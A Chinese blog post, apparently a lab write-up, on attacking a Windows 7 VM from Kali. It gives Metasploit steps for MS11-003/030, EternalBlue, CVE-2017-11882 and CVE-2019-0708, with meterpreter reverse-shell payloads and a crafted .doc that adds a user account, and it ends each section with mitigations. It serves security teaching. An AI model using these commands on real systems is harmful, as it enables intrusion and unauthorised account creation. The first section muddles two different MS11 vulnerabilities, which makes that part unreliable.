对win7进行网络渗透

最新推荐文章于 2024-03-28 23:56:50 发布
最新推荐文章于 2024-03-28 23:56:50 发布
阅读量2.2k 收藏 13
点赞数 1
文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57157540/article/details/125470544
版权

文章目录

一.准备两台虚拟机,kali和win7,使用neuss和nmap对win7进行扫描

在这里插入图片描述
在这里插入图片描述

二.ms11_030

1.ms原理:在已经安装的 Windows DNS 客户端处理链路本地多播名称解析查询方式中的一个缺陷可被利用来在 NetworkSer11-030 DNS 解析中的漏洞可能允许远程代码执行vice 帐户的上下文中执行任意代码。如果攻击者获得对网络的访问权限,然后创建自定义程序以向目标系统发送特制的 LLMNR 广播查询,则该漏洞可能允许远程执行代码。
2.渗透过程
设置参数 (payload,ip等)
use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp
在这里插入图片描述
3.Exploit后出现网站,win7访问
在这里插入图片描述
4.获取shell,ipconfig,发现可以添加用户
在这里插入图片描述
5.防御方案:
*在防火墙禁用TCP端口5355和UDP端口5355
*使用组策略禁用链接-本地多播名称解析
*关闭网络发现

三.MS17-010(Eternal blue永恒之蓝)

1.MS17-010
原理漏洞:永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
2.渗透过程
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.1.33
set payload windows\x64\meterpreter\reverse_tcp
set lhost 192.168.1.12
在这里插入图片描述
3.攻击后,获取shell
在这里插入图片描述
4.预防方案
*关闭445端口
*开启防火墙,或者在高级中修改进出的端口信息
及时更新系统,打漏洞补丁

四.CVE-2017-11882

1.CVE-2017-11882
原理:OFFCIE中有一个文件是负责做公式编辑的文件EQNEDT32.EXE,该模块为公式编辑器,它以OLE技术将公式嵌入在Office文档,当插入和编辑数学公式时,EQNEDT32.EXE并不会被作为Office进程(如Word等)的子进程创建,而是以单独的进程形式存在。这就意味着对于WINWORD.EXE, EXCEL.EXE等Office进程的保护机制,无法阻止EQNEDT32.EXE这个进程被利用。由于该模块对于输入的公式未作正确的处理,攻击者可以通过刻意构造的数据内容覆盖掉栈上的函数地址,从而劫持程序流程,在登录用户的上下文环境中执行任意命令。
2.渗透过程
命令生成文档
python Command43b_CVE-2017-11882.py -c “cmd.exe /c net user xxx 123 /add” -o cve.doc
在这里插入图片描述
3.将ps_shell 移入攻击模块
在这里插入图片描述
4.重启apache服务
在这里插入图片描述
5.将cve.doc移入传win7中
6.设置参数(uripath,payload,lhost)
use exploit/windows/smb/cve_2017_11882
set payload windows/meterpreter/reverse_tcp
set URIPATH /
在这里插入图片描述
6.获取shell,可以创建用户(管理员权限)
在这里插入图片描述
7.预防措施
微软11月份的安全补丁已经修复了此漏洞。
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
开启Window Update功能, 定期对系统进行更新维护。
由于涉及模块已经很久未做更新,可能存在大量的安全漏洞,建议取消该模块的注册。
按下Win+R组合键,打开cmd.exe;
reg add “HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

五.CVE-2019-0708

1.CVE-2019-0708
原理:漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像永恒之蓝漏洞一样大规模的感染。
渗透流程
2.在win7中开启3389端口‘
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
在这里插入图片描述
3.设置参数
在这里插入图片描述
4.攻击后发现蓝屏
在这里插入图片描述
5.预防方案
*关闭3389端口或添加相应防火墙安全策略限制对3389端口的访问。
*升级操作系统至Windows 8及其以上版本。对于这些版本的Windows系统并不存在CVE-2019-0708漏洞。通过微软官网发布的漏洞补丁进行修复。Windows 7、Windows Server 2008和Windows Server 2008 R2:及时安装官方安全补丁。

老弟和你
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
局域网渗透的一些小工具(支持win7)
10-31
一些内网的,命令行格式的工具,可以来看看,很简单
内网win7渗透(初级)
weixin_51454892的博客
11-02 3481
攻击机kali2021 .查看一下IP地址 目标主机win7 ipconfig查看地址 :确保相互之前可以通讯 开始渗透; 开启kali命令行 使用工具nmap工具扫描一下目标开放端口 使用nmap扫描靶机查看可以利用模块(快) 显示可以利用模块ms17-010 打开渗透工具msfconsole 调用模块ms17-010 msf6>use ms17-010 (这是是新版kali调用命令,简便) 可以看到各种模块,这里我们只用...
针对基于Windows 7系统的一种攻击方法——在kali Linux里面利用Metasploit查询控制目标电脑终端
最新发布
qq_64498620的博客
03-28 952
网络安全领域,Metasploit是一款广泛使用的渗透测试框架,它使安全研究员和渗透测试人员能够发现、利用和验证系统漏洞。通过Metasploit,专业人士可以对目标计算机进行精确的攻击模拟和控制,以评估网络的安全状态。本文旨在探讨如何使用Metasploit来控制目标电脑,并分析其潜在的安全影响。
利用NSA的MS17-010漏洞利用工具实现Win 7和Win Server 2008系统入侵
weixin_34138521的博客
04-28 378
影子经纪人(Shadow Brokers)最近陆续曝光的NSA网络武器令人震惊,尽管这些工具是否出自国家级别黑客团队之手尚不清楚,但至少存在一个可以说明问题的事实:这些漏洞利用工具都能有效运行,且具有一定程度的威胁杀伤力。在此,我用NSA的两个大杀器演示对Win 7和Windows  Server 2008系统进行漏洞利用和入侵控制的过程复现。 复现工具说明 在需要用到两个比较有意思的工具,一个...
安全渗透测试-win7
liuguangshibei的博客
06-24 2401
攻击机:kali 靶机:windows7x64 靶机开放服务:Apache2.4.39、MySQL5.7.26采用工具:nmap、nessus,msf 攻击方式:后门利用
msf渗透win7
qq_61988806的博客
12-17 1576
环境设置 攻击机 kali 靶机 ip 192.168.1.110 题目 1.得到靶机最高权限的用户的登录密码 2.找到桌面下1文件夹中的1.txt 3.得到靶机的dns地址
第17节 利用漏洞解开win7密码(大飞哥网络安全初学者课程).mp4
07-18
大飞哥网络安全第一阶段课程,适合0基础/初学者体系化学习,也适合老手巩固基础观看,希望大家在学习过程中理解技术原理,为更深层次的防御攻击等学习打好基础。最好别用mac,好多工具不兼容。
win7下APP渗透环境之drozer工具包.zip
05-16
APP渗透drozer工具包,包含adb安卓调试桥,adb_interface_usb_driver,drozer-agent-2.3.4.apk,Twisted-19.2.0-cp27-cp27m-win32.whl,drozer-2.4.4.win32,VM虚拟机上win7.64系统通过这些包可搭建一套drozer渗透环境
第18节-部署安装win7虚拟系统.mp4
05-27
大飞哥网络安全第一阶段课程,适合0基础/初学者体系化学习,也适合老手巩固基础观看,希望大家在学习过程中理解技术原理,为更深层次的防御攻击等学习打好基础。最好别用mac,好多工具不兼容。
网络渗透技术
10-04
 《网络渗透技术》是国内第一本全面深入地披露系统与网络底层安全技术的书籍。本书分为十个章节,详细介绍了渗透测试技术的方方面面。 首先介绍了各种调试器和分析工具的简单使用,然后从各种操作系统的体系结构讲...
内网渗透--windows
weixin_44940180的博客
08-18 242
windows基础命令 添加管理员用户,设置密码为123456 net user cly 123456 /add net localgroup administrators cly /add 如果远程桌面连接不上,那么可以添加远程桌面组 net localgroup "Remote Desktop Users" cly /add
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
Metasploit入侵win7系统
weixin_45092418的博客
06-18 2243
Metasploit入侵win7系统一:实验环境二:获得信息a.获得网络拓扑图b.获得主机ip和目标ip三:实施入侵a.打开控制终端b.查找漏洞c.进行配置四:对主机进行操作五:做个守法的好青年 一:实验环境 主机:安装有Metasploit的kali linux 操作系统 目标:已关闭防火墙的win7系统 二:获得信息 a.获得网络拓扑图 画出网络拓扑图,确定你和目标主机在同一局域网下。 b.获得主机ip和目标ip 1.主机ip:ifconifg 这里的eth0是你有线连接的ip地址,也是lhost。
MS08-067漏洞 入侵Windows7
qq_34835962的博客
04-10 1678
kail利用msf工具对ms11-003漏洞入侵渗透Win7
qq_50854662的博客
05-26 1770
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.29.134 步骤: 1、在kali里面打开metasploit漏洞利用框架 2、搜索ms11-003漏洞利用模块 3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import 4、设置payload set pay...
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 3024
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
msf通过win7“ms17-010:永恒之蓝”进行渗透测试
weixin_41023533的博客
11-24 3270
msf通过win7“ms17-010:永恒之蓝”进行渗透测试 一.查找该漏洞 二.使用该漏洞的探测模块(auxiliary/scanner/smb/smb_ms17_010),对目标主机进行‘是否存在该漏洞’的检查 三.使用该漏洞的攻击模块进行攻击(use exploit/windows/smb/ms17_010_eternalblue) 四.创建新用户,并进行远程连接(方法一) 使用enable_rdp脚本开启远程桌面并创建用户 1.开启远程桌面:run post/windows/manage/en
渗透测试实验_安装Windows7旗舰版
weixin_47133613的博客
03-13 2243
文章目录安装Windows7旗舰版 安装Windows7旗舰版 第一步:新建虚拟机,导入镜像 输入密钥 选择安装的位置 固态类型选择BIOS 选择处理器数量 设定内存大小 分配磁盘,建议Windows7 64位选择60G 虚拟机创建成功 第二步:安装Windows7 安装成功 ...
web渗透——(利用win7漏洞)破解系统密码
weixin_44321116的博客
08-24 1266
一、利用5次shift漏洞破解win7密码 1.1漏洞 1.2破解过程相关知识 1.3漏洞利用过程 建一个普通用户shimisi,并用shimisi用户登录win7系统 给shimisi用户设置密码(随意乱设置) 点击开始-》注销 此时一定进不去 将鼠标点进虚拟机,连续按5次shift键进入粘滞键(如果没出来就说明没有这个漏洞),我们需要利用这个漏洞将粘滞键换成cmd窗口,然后既可以破解密码 关机重新开机等出现win7图标时强制关机 一直重复以上操作,直到开机出现windows错误恢复即可
win7对计算机进行重镜像
09-19
Win7对计算机进行重镜像,指的是将计算机的操作系统重新安装或恢复到初始状态的过程。 首先,重镜像通常是为了解决计算机出现问题或需要对操作系统进行优化而进行的操作。在重镜像之前,应备份重要的文件和数据,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

老弟和你

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值